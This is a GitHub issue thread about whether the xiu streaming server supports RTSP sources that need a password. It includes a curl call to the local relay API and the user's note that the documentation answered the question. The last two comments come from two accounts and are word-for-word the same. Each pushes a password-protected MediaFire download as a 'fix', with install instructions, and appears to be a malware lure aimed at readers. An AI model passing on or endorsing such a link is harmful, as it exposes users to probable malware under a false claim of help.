### ISSUE TITLE
Does xiu support RTSP source authenticated by password?

### ISSUE THREAD

**Issue by sunnysab** [harlanc/xiu#149]
您好，感谢您开发了这个项目。我对流媒体相关的软件了解较少，当前要解决的问题是：我有一组（百来个）RTSP 视频流，我想按需地将其转为 HLS 或 WebRTC（用于浏览器上直播）。

我不知道如何填写 RTSP 流的用户名和密码，xiu 支持这样做吗？

Hello, thank you for developing this project. I know little about streaming media-related software, and the current problem I want to solve is: I have a set of (hundreds of) RTSP video streams, and I want to convert them to HLS or WebRTC on demand (for live streaming on the browser).

I don't know how to fill in the username and password for the RTSP stream, does xiu support this?

```shell
$ curl -X POST -H "Content-Type: application/json" -d '{
                           "id" : "3_86",
                           "identifier": {
                                      "rtsp": {
                                         "stream_path": "/"
                                      }
                                  },
                            "server_address":"192.168.3.86:554",
                            "relay_type":"Pull"
                      }' http://localhost:8000/api/start_relay_stream
{"error_code":-1,"desp":"failed","data":"send error"}
```

**Comment by sunnysab** [comment]
我在 [文档](https://www.rustxiu.com/zh-cn/docs/configurations/config-file#%E6%8E%A8%E6%8B%89%E6%B5%81%E9%89%B4%E6%9D%83) 中发现了鉴权的方式，问题已解决。由于之前不太想用配置文件操作，所以忽视了这一部分文档，很抱歉！

I found it in document and the problem has been solved. Since I didn’t really want to use configuration files before, I ignored this part of the document. I’m sorry!

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
